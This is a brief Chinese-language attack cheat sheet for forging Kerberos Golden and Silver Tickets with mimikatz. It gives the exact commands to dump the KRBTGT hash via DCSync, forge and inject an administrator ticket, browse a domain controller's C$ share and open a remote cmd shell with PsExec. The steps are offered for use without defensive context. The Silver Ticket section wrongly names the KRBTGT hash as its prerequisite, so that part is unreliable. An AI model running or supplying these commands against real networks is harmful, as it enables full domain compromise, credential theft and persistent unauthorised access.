黃金票據
前提條件
- 域名稱
- 域的SID值
- 域的KRBTGT賬戶的 Hash NTLM
- 偽造的用戶名(這里是 administrator ),可以是任意用戶甚至是不存在的用戶
利用
mimikatz的下載地址:https://github.com/gentilkiwi/mimikatz
PsExec的下載地址:https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
ipconfig /all #獲取域名(前提條件1)
whoami /all #獲取域SID值(前提條件2)
lsadump::dcsync /domain: /*域名*/ /user:krbtgt #獲取KRBTGT賬戶的 Hash NTLM(前提條件3)
klist purge #刪除票證
kerberos::golden /admin:administrator /domain: /*域名*/ /sid: /*SID*/ /krbtgt: /*Hash NTLM*/ /ptt #偽造票據(前提條件4)
dir \\abc.test.com\c$ #查看域控的C盤目錄(abc.test.com為域控全名)
PsExec.exe \\abc.test.com cmd #使用PsExec獲取一個cmdshell
白銀票據
前提條件
- 域名稱
- 域的SID值
- 域的KRBTGT賬戶的 Hash NTLM
- 偽造的用戶名(這里是 test ),可以是任意用戶甚至是不存在的用戶
利用
偽造票據命令如下:
kerberos::golden /domain: /*域名*/ /sid: /*SID值*/ /target: /*域控全名*/ /service:cifs /rc4:/*Hash NTLM*/ /user:test /ptt